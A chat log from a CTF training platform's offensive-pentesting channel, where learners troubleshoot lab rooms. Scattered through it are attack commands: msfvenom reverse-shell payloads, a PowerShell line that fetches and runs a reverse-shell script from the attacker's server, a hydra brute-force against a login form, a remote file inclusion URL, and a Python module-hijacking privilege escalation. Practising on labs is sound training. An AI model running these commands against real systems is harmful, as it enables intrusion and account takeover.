#offensive-pentesting-path
I feel kinda bad looking at the writeups
I am considering skipping them and re trying once I finish the rest of the path, not sure if it is a good idea
I think Relevant’s foothold is a little silly but both rooms are mostly a test of methodology
Coming back to them is a perfectly fine approach
Learn from where you got stuck, and consider adding that to whatever mental/physical checklist you have when you do boxes.
I am slowly building a methodology for boxes, but I have a couple questions if you don't mind. How does brute forcing fit in CTFs? Do I have to try it for every login prompt (after trying default credentials)?
So I should always try it but for no longer than 5 mins? OK, Thank you!
Note that newer machines these days on CTF platforms tend to stray away from brute forcing a login as a foothold because it’s not very interesting after the first 5 times, but it’s still something to keep in mind for things beyond CTFs
if a brute force attack using a dictionary attack works it just means better passwords need to be made
hey guys, could you recommend me some books? i just finished reading Linux Basics for Hackers, and i read the first two books from Networking All-in-One for Dummies. i have very basic bash scripting skills, i know python and javascript so i think i can consider myself a "script kiddie" at least. i would like to advance, what would be the best books for kali?
this channel is not the best for finding book recommendations so will point you to the #bookclub channel... where in the pins which you can find in the upper right of the screen on desktop or by swiping from the right to left on mobile has some book recommendations
i did check the channels but skipped that one lol, sorry for that and thanks
no problem
And the application should have measures to deal with brute force attacks
oh yeah that is an obvious oversight on shadows part.... thanks for the mention of it
Gave +1 Rep to @keen iris
Hello Friends, I need help at this point. Why id_rsa is being ignored?
what permissions i have to assign?
It's in big letters
And if you google the message, you can easily learn
"it is required that your private key files are NOT accessible by others."
Gave +1 Rep to @keen iris
The general rule is that you should google it first before asking here
Okay Brother got it.
Anyone can please guide?
read-only file system
So you can't modify it
Copy the file to somewhere locally
Ohhh Okay.
Hi. I already posted this in "subs-room-help" but I think this is the right place for that.
I'm on "Game Zone" and I'm stuck at task 5. I can't get the ssh tunnel to work.
If I try open "localhost:10000" on my machine the SSH-connection says "channel 3: open failed: administratively prohibited: open failed"
you need to change permission for file id_rsa. something like "chmod 0660 id_rsa"
Hi, I am wondering should I do the junior pen tester path before the offensive pen tester path? I have experience with Linux and msf etc, and have been working through the offensive path however just realised there is a junior path as well. I can’t find a way to enrol for more than one path at a time. Should I keep at the offensive path and do the jr pen tester path after or should I switch now?
I'm solving Steel Mountain, but my reverse shell doesn't work
```
C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\Program Files (x86)\IObit\Advanced SystemCare>
```
```
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler **.*.**.**:9898
```
What is the problem
I tried many ways like:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=**.*.**.** LPORT=9898 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
```
I tried to generate it with -f exe option also
```
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     **.*.**.**       yes       The listen address (an interface may be specified)
   LPORT     9898             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on **.*.**.**:9898
```
I'm doing the buffer overflow room Brainstorm and I cannot get the chat application to run on my windows 7 64 bit VM and on my windows 10 64 bit VM. I've tried troubleshooting compatibility to no avail. Can someone please help me out?
I've seen 2 writeups (one text and the other a video) and they don't seem to have any issues running the chatserver app
fyi, you have to have the dll in the same directory from where you're running the app
Yes, did that
can you show a screenshot of the error? you'll have to verify to send images
!docs verify
@fathom marten here's the error from win10
The error from win7
same directory structure in win7 as in win10
yeh, that's a VM thing, if you want to run it still, you can use thm's blue machine or windows base machine but it'll run fine in Immunity debugger AFAIK
arghh great! thanks again!
Hello is there a W7 iso file to download for immunitydebug & mona or do I have to create it from scratch?
(for brainpan)
thx
just download and run the normal setup file
ok nothing fancy then
Well I give up, I cannot run nor can I open the chatserver executable from the BrainStorm room. I've tried everything I can think of. I tried using the 64 bit and 32 bit version of Windows 10 and windows 7 and I also tried using the windows 10 base machine provided by tryhackme and I cannot get it to open.
Anyone able to do this room? Any suggestions for being able to debug the executable?
The closest I got to running it was in Windows 10 32 bit. When I open it, I get an error saying "This program cannot be run in DOS mode"
I did that
Beyond that, I have no suggestions
crap
One of the times I tried to run it, yes
Same error
"This program cannot be run in DOS mode"
also
and I tried opening it directly from immunity
☝️
wouldnt something like kdbg work? just trying, i used rdp to do the room
or ghidra
I haven't been able to figure out how to do brainstorm. I had the same issue with gatekeeper, but found the solution using the "dobufferstackoverflowgood" executable found on the buffer overflow prep machine. I saw a different executable called vulnserver with the essfunc.dll that I think chatserver uses but vulnserver seems to work different compared to chatserver, so I haven't done it.
I had no issue just creating a new windows 10 VM (workstation 16), installing immunity and mona and running the oscp ones (gatekeeper, chatserver, brainpain). So it does work.
nothing special, no windows updates from original iso install yet, just an isolated test VM
working on Overpass 2 - Hacked room and I'm up to the point where I'm attempting to get back in... when I try to get into the back door I get something unexpected: (see screenshot) -- any ideas?✅
Self-resolved.
Hi, I have a strange issue with brainstorm, found the right EIP, rtn adress, whatever ; got a reverse shell on my w7 box, BUT, when i'm trying on THM network, connected to OpenVPN for sure, changing IP on the script with box IP, I can't have a reverse shell. It's the same exploit, only ip changing and I have no issues connected thru VPN. Any ideas? Thanks for your help 😄
Try the same script from the attackbox, a number of people have had the same issue
ok will do right now!
thx
and it's working!
thx a lot @fathom marten was wondering why :p
Gave +1 Rep to @fathom marten
Honestly, not sure why this happens but maybe something to do with the connection from vpn and attackbox 🤷♂️
strangely anyway
```
Listening on [0.0.0.0] (family 0, port 443)
Connection from 104.210.55.152 45193 received!
\ufffd\ufffd62\ufffdZ\ufffd\ufffdM\ufffd\ufffd]b\ufffdu\ufffd\ufffd2\ufffdP\u0540\ufffd\ufffd\ufffd}\ufffdet\ufffd\ufffd @\ufffd
```
^^
well will try to understand why
I'm solving Brainstorm but I can't download the chatserver
```
ftp> cd chatserver
250 CWD command successful.
ftp> binary
200 Type set to I.
ftp> mget *
ftp: Can't connect to `10.10.51.142:49173': Connection timed out
421 Service not available, remote server has closed connection.
ftp>
```
Use get and see if it works
don't forget binary or it will be corrupted
Ah wait, is this the correct port? 49173
Yes
I have downloaded it using the attack box, I think I have a bad connection
👍
Thank you for your support
it was me for brainstorm :p happy to finally have got it! ^^
Hello
I have been stuck at the Steel Mountain task 4
having this screen when I'm trying to attack the target machine
```
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape
```
can someone help me?
Weird, the only difference is that I use vbox... That shouldn't have an impact though
constantly having machines disconnect on me tonight... is there some server maintenance or something happening?
How do i set up a host in /etc/hosts in the nahamsec thing on TryHackMe? im using my own vm with openvpn
You just add a line like this:
```
<IP> <domain-name>
```
Another good way is
```
echo "10.10.xxx.xxx NAME.thm" | sudo tee -a /etc/hosts
```
Hi all! I'm just getting started on the Offpen learning path. Within the Vulnveristy room, it looks like my attackbox is not running a webserver, which is stopping my progress. Has anyone ran into this before and if so, did you manage to fix it? Thanks ahead of time.
Oh ya for sure. It looks like the learning path for gobuster, Burp Suite, and privilege escalation all rely on this vulnerable preconfigured web server though.
Yup it's up and running. It looks like port 3333 should be opening, running an apache web server. However, on my specific machine, it is not.
Well i'm on the step when we use gobuster to discover the directories of the webserver and of course, I can't access the webserver via that tool.
Well the web server isnt running.
I checked via nmap. However, my IP is 10.10.20.137.
Doh!
Well I'm going to go hide in a corner for a while lol! It's always a user error right? haha
Thank you for the help
We call those a PICNIC
Ok I gotta know... what does PICNIC stand for lol?
Problem in chair, not in computer
Haha that's spot on
Hello everyone, I just completed this path and the certificate didn't show my full name, so I changed it to make it correct, but now the certificate doesn't seem to update
So I wanted to know if i'm screwed or if it will change with a little patience, or if I need to do something else ?
Thanks for your response
Anyone else have this issue - my revshell from msfvenom gets this error Command shell session 1 is not valid and will be closed
Make sure your handler has the payload set correctly
This is what I set msfvenom -p windows/meterpreter/reverse_tcp LHOST=VPNIP LPORT=9001 -f exe > rshell.exe ...then msfconsole - use exlpoit/multi/handler - set LHOST and LPORT - run
You need to set your payload in multi/handler
Don't use > for binary data, it can break your payload
set payload windows/meterpreter/reverse_tcp - you were right ..thanks for the help
ID 10 T errors
I need help understanding args, I can't find anyone talking about it online. For example I don't even understand this question: What optional argument can the ftp-anon.nse script take?
I think you’re talking about code analysis? For instance, you should be able to take some script that you’ve downloaded and open it in a text editor then scan the code for what parameters the methods within take. My apologies if you’ve already done this.
The documentation online has only one argument for that script and it has a default setting so you don't even need to provide it. You call the script using `nmap --script=ftp-anon $IP`
Is there anyone willing to sort of mentor me on buffer overflows? It's one of the few things I'm still struggling with and need to get past.
please DM me ❤️
Can someone help me with the following room? https://tryhackme.com/room/metasploitintro
I can't seem to get into the live machine while following the steps, i was wondering if anyone could look into it with me
But i seem to get failures
What is wrong about the LHOST
should it be the ovpn ip?
Thank you, I assume this is the case for every exploit i try to run using ovpn right?
You need to bear in mind where the reverse shell is going
I was having issues with the room called Brainstorm earlier -- Task 1 question 2 asks "How many ports are open?" -- I did an nmap scan and got an answer. I put that answer in to the block, clicked the submit button, incorrect. Looking for someone to confirm that there's a problem with the room?
yeh, it's been a common issue, maybe udp ports are counted, maybe the room machine got updated and closed extra ports, it's irrelevant to the actual machine for what it's worth
Thanks I've been spinning my wheels trying to get to the "Correct" answer but i guess my answer is right already
I'm having trouble running the PowerUp shell on the Steel Mountain machine, anyone know how to solve it?
that's an html file
notice the button and div tags you see in a standard html file, wget using the raw link or copy paste the actual code
You say create a direct file on the compromised machine?
No
When I executed the PowerUp file, the system returned me error in all parameters
You downloaded an HTML file
Not the powershell script
How could we know the active directory domain name in Attacktive Directory in task 4 ?
probably use enum4linux
```
enum4linux -A IP_address
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug 6 08:54:45 2022

 =========================================( Target Information )=========================================

Target ........... IP_address
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ============================( Enumerating Workgroup/Domain on IP_address )============================

[E] Can't find workgroup/domain

 ===================================( Session Check on IP_address )===================================

[+] Server IP_address allows sessions using username '', password ''

 ================================( Getting domain SID for IP_address )================================

Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

[+] Host is part of a domain (not a workgroup)

enum4linux complete on Sat Aug 6 08:54:57 2022
```
I found smb domain name: THM-AD but it's not active directory domain
An nmap scan of all ports with -sC will tell you
Thank you
Gave +1 Rep to @mellow tusk
Is it normal that the room Daily Bugle is vulnerable to CVE 2021-4034 ? I can give more info if needed.
Ok thx
Hello, I am currently doing Abusing Kerberos in Attacktive Directory. When i try to run the command `GetNPUsers.py spookysec.local/svc-admin -no-pass` I get the following error:
```
Traceback (most recent call last):
  File "GetNPUsers.py", line 42, in <module>
    from impacket.examples.utils import parse_credentials
ModuleNotFoundError: No module named 'impacket.examples.utils'
```
Could anybody help me out?
what is impacket version
I am using the in browser instance of THM
Version used is 0.10.0
as in the in browser instance of THM Box
and I am getting an issue with secretsdump.py also
```
Traceback (most recent call last):
  File "secretsdump.py", line 61, in <module>
    from impacket.examples.utils import parse_target
ModuleNotFoundError: No module named 'impacket.examples.utils'
```
I think you are using python2 not 3
The machine uses Python3
```
root@ip-x.x.x.x:/opt/impacket/examples# python3 GetNPUsers.py spookysec.local/svc-admin -no-pass
Traceback (most recent call last):
  File "GetNPUsers.py", line 42, in <module>
    from impacket.examples.utils import parse_credentials
ModuleNotFoundError: No module named 'impacket.examples.utils'
root@ip-x.x.x.x:/opt/impacket/examples# GetNPUsers.py spookysec.local/svc-admin -no-pass
Traceback (most recent call last):
  File "/usr/local/bin/GetNPUsers.py", line 4, in <module>
    __import__('pkg_resources').run_script('impacket==0.10.1.dev1+20220606.123812.ac35841f', 'GetNPUsers.py')
  File "/usr/local/lib/python3.6/dist-packages/pkg_resources/__init__.py", line 665, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/local/lib/python3.6/dist-packages/pkg_resources/__init__.py", line 1463, in run_script
    exec(code, namespace, namespace)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.10.1.dev1+20220606.123812.ac35841f-py3.6.egg/EGG-INFO/scripts/GetNPUsers.py", line 40, in <module>
    from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.10.1.dev1+20220606.123812.ac35841f-py3.6.egg/impacket/dcerpc/v5/samr.py", line 32, in <module>
    from impacket.dcerpc.v5.rpcrt import DCERPCException
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.10.1.dev1+20220606.123812.ac35841f-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 26, in <module>
    from Cryptodome.Cipher import ARC4
  File "/usr/local/lib/python3.6/dist-packages/Cryptodome/Cipher/__init__.py", line 27, in <module>
    from Cryptodome.Cipher._mode_ecb import _create_ecb_cipher
  File "/usr/local/lib/python3.6/dist-packages/Cryptodome/Cipher/_mode_ecb.py", line 29, in <module>
    from Cryptodome.Util._raw_api import (load_pycryptodome_raw_lib,
  File "/usr/local/lib/python3.6/dist-packages/Cryptodome/Util/_raw_api.py", line 86, in <module>
    ffi = FFI()
  File "/usr/local/lib/python3.6/dist-packages/cffi/api.py", line 56, in __init__
    backend.version, backend.__file__))
Exception: Version mismatch: this is the 'cffi' package version 1.14.2, located in '/usr/local/lib/python3.6/dist-packages/cffi/api.py'. When we import the top-level '_cffi_backend' extension module, we get version 1.11.5, located in '/usr/lib/python3/dist-packages/_cffi_backend.cpython-36m-x86_64-linux-gnu.so'. The two versions should be equal; check your installation.
```
I’m offended
by?
This pentesting path
because?
It’s offensive
lol
I know the daily bugle is categorized as a hard box but, it didn’t seem very hard. I was proud at first to be able to do a hard box on my own but, it seemed to easy. Anyone else get that feeling?
There's a weird bit in the middle but it's not technically too difficult
Any tip what wordpress is using for hash? I found examples like: $P$BU6KTu61vxuI92JgwTztG1yTcR90Ar0
is there any chances to decrypt? (i am beginner)
first identify the type of hash by using `hashid $HASH` or hash-identifier
i found out this is a phpass HASH used by wordpress
Where'd you get the hash from? A room on the path?
No i found on internet trying to learn more about hashes
Where on the internet?
here is another one
there are a lot of
Has anyone recently completed "Brainstorm" without issue? I've been having some serious issues with the box's functionality -- curious if it is just me
Please ask your questions directly
want me to dm you or who do I ask directly?
Ask here
Explain your issue
Don't ask if anyone's complete the room recently. Ask for the help you actually need.
That's the thing, I don't actually have a question or need any help with buffer overflows -- I just need to know if the machine is operating as expected. If it is, then I don't need anything.
Please describe why and how it's not operating as you'd expect.
That's what you evidently want help with....
first issue: when I connect to the ftp anonymously...
I could use some help, please. I just made it to Bash Scripting, and I feel lost. I'm having trouble executing the bash exercise in Linux. Wondering if someone can help guide me while I practice. Or should I just skip it and move on?
Hello, I'm on the Attacktive Directory module, on the task 8 ( flag submission ).
In the previous task i obtained the hashes from the different users, including Administrator, svc-admin, backup, etc. This task is to get the flags from their desktops. I assume i need to use evil-winrm and i believe this is the right use but still is dropping errors. See below:
Then when i don't come with other things and i was reviewing my notes. I went to check some writeup and they are doing exactly as i do, it just does not work for me
Someone who might be able to help?
So I'm on vulnversity box, using burpsuite for the sniper attack - I sorted the payload and tags as directed, and when I ran the attack it gave me 'Extension not allowed' as the response for .phtml. I adjusted it, so the payload didn't include the dot - it stayed within the request itself and didn't vary, which made the extension work. Apparently the dot gets converted into URL, so it become %2e, which meant the website didn't recognise it. Any tips apart from the obvious (keep the dot constant) to avoid this?
thanks :)
So I've come back to the room, and I'm trying to send the same request to intruder to see if I can get it to work the way the instructions ask
I have burpsuite open, scope limited only to the website, proxy options changed so it only intercepts requests to URL inside scope, but other than that no other changes
as soon as I press submit on the upload form CPU usage on the AttackBox shoots right up to 100%, and BurpSuite is completely unresponsive - I can't press any buttons, and when I minimise and open it back up again it's a completely white page
it doesn't respond to me trying to close it
this is using firefox with foxyproxy on default burp settings
it's worked for me without the scope settings
Can someone help ? i kept trying. Same results
Hi walter, your syntax looks good! it looks like you have a spelling error in with "Administrator"
Maybe try that 😄
at the beginning i thought i was the silliest but then i remembered that i tried other accounts as well and i got the same result. You marked a great point! but still the same.
have u tried adding that ip to your /etc/hosts and use hostname instead of ip
When i did the room, i didnt put the domain in front of the user, i just did it like this: - You could try that perhaps 😄
what note tool is that?
it´s obsidian - really cool 😄
i use that too lol
but how do u make that box?
oh it's a "code block" the syntax is like this:
some code
the only thing i can do lol
oh well discord uses the same syntax for code blocks
ohh how about that red shell?
ill send a screenshot
ahh three `
yup and you just put whatever coding language u want and it will try to highlight 😄
yea so "bash" or shell
that's why mine is always blank
it will try and do it's best at highlighting
thank you
Gave +1 Rep to @drifting vapor
Gotchu
hello
somebody doing buffer overflow or studying it?
Hello, I have a problem with Overpass2 and at the end of the room when you should ssh on -p 2222 james@<ip> back in to the server as the attacker did, I can't connect. Getting an error message. Don't know what to do.
```
Unable to negotiate with 10.10.56.241 port 2222: no matching host key type found. Their offer: ssh-rsa
```
are you studying BO from where?
👍
overthewire for BO? will take a look on ROPemperium and picoctf
thanks person!!!! i was only doing bash commands challenges
Someone with the problem in Brainstorm too?
I figured it out a while ago - let me know if I can be helpful
Hi. For the HackPark i created a reverse_tcp payload with the Message.exe title and set up the handler. But when i tried to invoke it from my shell i get the following error:
```
Invoke-WebRequest : The process cannot access the file 'C:\Program Files (x86)\SystemScheduler\Message.exe' because it is being used by another process.
```
@woeful arrow What did you figure it out?
The only challenging part of the room for me was getting the binary off of the ftp server. I was getting an error message I’d never encountered before from ftp, I imagine they made it part of the room but I’m unsure.
Once I had the binary, I sent it over to my windows 10 machine and used some custom python scripts to figure out the ESP/EIP for buffer overflow.
I think the ftp server was set to passive mode or something silly, and getting it out of passive mode is pretty simple— easy Google search
Why does AS-REP roasting require pre-authentication to be disabled? If I understood correctly, this attack consists of brute-forcing the KRB_AS_REP response, which gets sent anyway
I'm on the Attacking Kerberos Room
That might help you here
If you can't see it, I can point out the important bit
Isn't it possible to sniff the AS-REP? Wouldn't that make the attack effective even if pre-authentication is enabled?
If I correctly understood what you sent (BTW thank you), if pre-authentication is disabled then it is easier to get the AS-REP for a specific user. But I don't see why enabling it would prevent people from just sniffing
https://adsecurity.org/?p=2293#:~:text=Note that this attack can also work by sniffing network traffic and grabbing Kerberos TGS tickets encrypted using RC4_HMAC_MD5 off the wire. - maybe slightly different as that's tgs?
Afternoon everyone
Yes. Been the toughest section for me. Still working through the BO section now
im still studying... too afraid to start... need to understand the basics so im looking for info everywhere... the channel from youtuber s4vitar helps a lot... and LiveOverflow too..
Well the basics surrounding how Buffer Overflow works are very confusing. Let me find this video by that famous British IT sec guy
s4vitar has a video doing an x32 machine from HTB, the basics are explained very well there
it's in Spanish of course
cool! good to know although me espanol is no bueno!
take a look at the LiveOverflow channel, it's awesome
the cybermentor has a good explanation too
Awesome! Will do. Thanks
Hello all,
Someone know why rockyou.txt wont load in burpsuite?
I could imagine that is very large for a VM but i have plenty ram and processor
smaller dictionaries load correctly
any workaround?
Only load the top 20k lines or something
ye, i see the logic of not needing to use that many. But if that would not be enough, it's always worth giving larger lists a shot
I was asking because of this.
that command does not work for me
so i was trying burp
It's HackPark
from the offensive pentesting path
where is the error in the syntax?
YES
you need to get stuff from the browser i think
should look something like this:
INTERNAL USE CASE: (Gathered details using web browser console > network tab)
```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.73.174 http-post-form "/phpmyadmin/index.php:pma_username=admin&pma_password=^PASS^&server=1&target=index.php&token=bfe8aacb8a8c4631dc57ad13fc02bc05:#1045 - Access denied for user 'admin'@'localhost' (using password: YES)" -vv
```
Worked ! Thanks man !
Gave +1 Rep to @hidden shoal
Anyone gone through BrainPan yet? Seem to be having trouble getting the reverse shell on this one, whether on a windows machine hosting the vulnerable exe or going straight at the target machine. I've checked my buffer, jump points, offset against walkthroughs at this point to see them match. I can even see bidirectional traffic on the port the exe listens on when running the exploit. But I'm not seeing the reverse shell port traffic we are listening for hit the attacking machine over tcpdump. Tried many variations of payloads and exploits.
Damn fine idea. Thanks for that
Gave +1 Rep to @hidden shoal
That worked
```
msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f py
```
Cool thanks for that suggestion. I'm sure I'll use that frequently in the future XD
Hello guys im currently working on attacktive directory and keep getting an error when trying to run GetNPUsers.py
The two versions should be equal; check your installation.
im not exactly sure what to check
can you verify and post a screenshot?
!docs verify
yea i can hold on
Oh wow smh ok thanks for the tip
I think an update is being worked on, but yup, not ready yet
Hey, guys! I'm doing the brainstorm room and I'm having problems opening the .exe in my windows Immunity Debugger. Is the .exe 32 bit?
I currently have a 64bit windows so I was wondering If I would need to install a 32bit windows just for this exe
This is the error I was referring to before
try running it as python3.9 GetNPUsers.py ?
I want to do Python module hijacking, there is a file called run.py I can run as root without password according to
```
sudo -l
(root) NOPASSWD: /usr/bin/python3 /home/cyber/run.py
```
run.py content:
```python
import os, sys, time

def delay_print(s):
    # Print the message one character at a time
    for c in s:
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(0.08)

def main():
    os.setuid(0)
    delay_print("Hey Cyber I have tested all the main components of our web server but something unusal happened from my end!")
    print("\n")
    os.system('service apache2 restart > /dev/null 2>&1')

main()
```
I created a file called sys.py in the same directory
its content:
```python
import os

os.setuid(0)
os.system('/bin/bash')
```
then
```
export PYTHONPATH=/home/cyber/
sudo /usr/bin/python3 /home/cyber/run.py
```
But run.py imports the original sys module, not my file. What should I do?
which room?
battery
can you move the file and create a new file in the name of run.py
yes I can, I've finished the room but I want to do Python module hijacking
@rocky wind this is what came up
Hello, wondering if you can help. I messed up my kali VM so had to reinstall it from scratch, reorganize my stuff, etc.
First time i continue with THM in the new machine, i go to the machine Retro ( Offensive Pentesting Path ). I find the user/password for the WordPress page and lets me in. I go to Plugins and find the place where i can edit the php code and put the reverse shell code. I've done this few times already in my previous machine but in here, there is some sort of issue.
wondering if its because it might be a win machine?
i know, that's why im wondering it
but that uname there is crucial
to drop the shell
sec
if you copy that line to your console, it'll drop a shell
i can try but why? this is the reverse shell from pentestmonkey
i've used the same script on other occasions and never had an issue
that was my initial suspicion
meterpreter shells is the easy way out for windows shells
unless you can finagle getting nc.exe or socat.exe on the target machine and make it execute and point at you
i switched that one for cmd.exe
does not work, neither using metasploit
it worked using this reverse code instead
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell_older.php
Hello, guys, I think I need your help with this one. I started working on the 'Active Directory Basics' room in the Offensive Pentesting Learning Path. In the fourth task I am supposed to do the delegation and give privilege to change others' passwords to a user phillip. Unfortunately, every time I granted the privilege to a user phillip and switched to his account I was not able to change sophie's password. I'm sending you also a screenshot of what error I have. I see that phillip doesn't have the permission for given action but I don't know why. Is there anyone that can help with this? Thanks a lot.
Looks like you may still need to do the delegation step
At least that's what the error looks like. Were you able to get it to work?
Hey, are you using the check users button after typing phillip to confirm you're assigning the permissions to the right account?
i changed the full name to my actual name in my profile but the certificate won't change it. How can i get it with my name ?
I faced the same problem so i changed my name to the original for the next certs🙂
yes i did but thanks anyway. the problem was that i was given permissions over the wrong OU
Gave +1 Rep to @rocky wind
For a complete beginner, which room/walkthroughs should they start from?
Use the learning paths
do the complete beginner path first and then focus on the area of interest
@hidden shoal https://tryhackme.com/resources/blog/free_path
I was thinking about this one
Is it a good start to become a pentester?
oh
idk what to do...
😔
After these, will I be able to do the basic pentesting and offensive pentesting rooms?
+rep @hidden shoal thanks ly
Gave +1 Rep to @hidden shoal
@hidden shoal most of the rooms in the Jr Pentester path are for subscription users only
What should I do?
all of these ^^
search for rooms in the Hacktivities tab that are free and do those
lots of free rooms available that are not part of the paths
yeah ik, but I was suggested to do Pre Pentesting and Pre Security so yh
well if you can't afford a subscription you are better off searching for rooms on things you wanna learn, checking for the free ones on said topic
no problem
btw it's not that I can't afford it, but I'm not all the way in yet
like it's not my top priority rn,
I'm preparing for a test these days
so I have like 3hrs at most to do this stuff
I will sub after the test tho
yhh 😊
For the room Alfred, after logging into the Jenkins site, when I go to configure the project and change the command to download my shell file and then run it, it returns with this.
Any solutions? I've seen people have had this issue
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
That's the code they tell you to use in the THM room. I have set up my python -m http.server and it doesn't work.
So what doesn't work? Seems like the listener is fine
404 - your paths for the files are wrong, you've likely got a typo or you're serving from the wrong place
Hi people! xfreerdp is not installing on Parrot, any suggestions?
Ok thanks!
Gave +1 Rep to @keen iris
Why can't I reach a connection to my python -m http.server? I am trying to get files from it with http://10.10.228.74/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.48.7:8000/rshell.php and I do not get a file download or any response at all. Why would that be? The IP in the http://10.6.48.7:8000/rshell.php part is my tun0 IP from OpenVPN
Remote File Inclusion????
Yes
that is very rarely a way to exploit machines... so I have a feeling that is not the intended way here either.....
could be wrong about that though
On their writeup it is
oh okay then
The problem is receiving a connection with my python server because I had this issue yesterday as well with another exploit.
Which was there^ in the replied message
!vpnscript
just to check the most basic thingy first
Gotcha, but I am still with the same issue, would you be able to assist me?
Gotcha
Yes because I can access it on my box but anywhere else no
How do I tick that off
Ah yes I tried this yesterday.
That was what it was at when I ran the command.
Should I disable ufw?
Thanks!
No connection or response
Skynet
I believe I know the issue in the revshell file but I wanna fix the python server first because I had the same issue yesterday with this and when I switched from my VM to the attackbox on the site it worked fine.
Got it working
Thanks
Can I request that the middle bit of the H in the ASCII art goes up by one as well? 😄 I always read it as TryWackMe
Fixed, sorry to disturb! Thanks anyway for the help
Gave +1 Rep to @glad kindle
Does somebody know why on Brainstorm task 1 the answer for open ports is 6 but when I scan it only shows 3?
did you let the target machine actually fully start before throwing the scan at it
yep... but even the Cyber Mentor writeup never shows 6 ports open
Hi, trying to get a file. I've started a Python server and do wget from Win10 but it's not working... any help?
Trying to get chatserver.exe from the room Brainstorm
Have you tried -outfile "output.exe"?
I do those commands in cmd but it uses PowerShell so idk the exact syntax in PowerShell
oh nvm I just saw the -O
wget your url before outputting it maybe
Hey guys, planning to start the Offensive Pentesting path in the next couple of days and would love to have someone to encourage me, and we can share knowledge and help each other along the way. Preferably level 8-10. My username is whoami2000
When I start an ARP scan the Windows machine doesn't get the IP from my Parrot
Did you use a bridged adapter on your Windows VM?
Nope... NAT... but because it didn't work I tried both... still doesn't work
Weird, because the VM and the actual computer should be able to communicate with each other when you are using bridged
Y u use bridged.
Try this in your cmd: powershell -c wget "http://<ip-httpServer>:8000/chatserver.exe" -outfile chatserver.exe
Doubt this will change anything
But you can try
will try then tell you
but wait
Should I use NAT or bridged on Parrot and Win10 in VB?
Both Parrot and Win?
So you are using Parrot for THM and Win10 for Windows stuff?
Then I think you should use an internal adapter for your 2 VMs to be able to connect
and communicate
check this
Parrot doesn't have a problem transferring with my machine, but Win10 on VB doesn't transfer anything, even if I copy and paste. It's like it doesn't recognize anything external
I mean copying and pasting between VMs is always weird
yay
Try to put 'adapter 2' on Parrot and Windows to 'internal'
yay
In adapter 2, what should I put on Parrot?
So adapter 1, should I leave it on NAT?
if you want to use the internet yeah 😄
@copper crypt @rancid compass #infosec-general
ok sorry
This channel is only for the #offensive-pentesting-path and rooms on that path
Right, mb
In the Post-Exploitation Basics Room, I faced a difficulty with Bloodhound. I'm new to Bloodhound. The upload button does nothing. Import button responds with "BAD JSON FILE". So, the only way I can upload the file is by the drag & drop method. But, in the Upload Progress window, it says "File created from incompatible collector" "NaN%". And it does not process the file. Any idea what I am doing wrong? Thanks.
Regarding Post-Exploitation Basics Task 3, I found the most success using the Attackbox and the last Bloodhound version before version 4 (3.0.5 I think). After unzipping the download, run the file named "Bloodhound" in the folder using the "--no-sandbox" flag, and you should be good to go. DON'T use the version of Bloodhound already installed. As of 8/28/22, it's not compatible with the version of SharpHound on the Windows machine you're running mimikatz and whatnot on
Hope this saves people some time troubleshooting
@hollow gyro
@vernal mason Thanks for tip. I shall try it.
Gave +1 Rep to @vernal mason
no problem
Hi! I just subscribed and got stuck right away with the PHP reverse shell, which doesn't seem to work well for me (I'm using the in-browser thingie). Any hints on what's wrong? https://imgur.com/a/xZ0UFcD
I uploaded the shell, and accessed it here: http://10.10.106.26:3333/internal/uploads/php-reverse-shell.phtml
Nothing pops up in netcat though.
!docs verify
Which room is this for? And as Shadow has pointed out, if you verify you can send screenshots 🙂
I'm sorry, this is pretty much my first time using Discord 😬 I will do that! https://tryhackme.com/room/vulnversity task 4
No worries, we all start with it somewhere 🙂
Are you sure? The code seems to be running on 10.10.106.26 - and I'm running netcat from 10.10.249.216 (obtained from http://10.10.10.10) 🤔
Haha yes, I'm a very self-destructive person
No worries! 🙏
Actually that's a good hint
I see a 500 error 😬
Just as a heads up, the web based Kali instance may be quite outdated, so some things in the future may not be installed/may be broken.
The page was blank so I just didn't care to check 😮💨
Good to know! I'll look into the other approach
It was a missing semi-colon. Haha! Thanks 😻
That might not be what's at play here, but worth using the AttackBox, or your own kali with VPN if you prefer that
aaah, a classic
now you've pointed it out it's obvious
I'll definitely try out the AttackBox. I'm too paranoid to switch off the VPN 😬
Yes, did too much Golang lately and this is what happens
Thank you @rocky wind and @hidden shoal
Hi people, I've tried those nmap scans for the Gatekeeper room but they don't work, they don't show any port open... any recommendation?
sudo nmap -A -sS -sC -sV -O IP
nmap --open -p- -A -sS IP
nmap -p- -sCV -sS -O -A IP
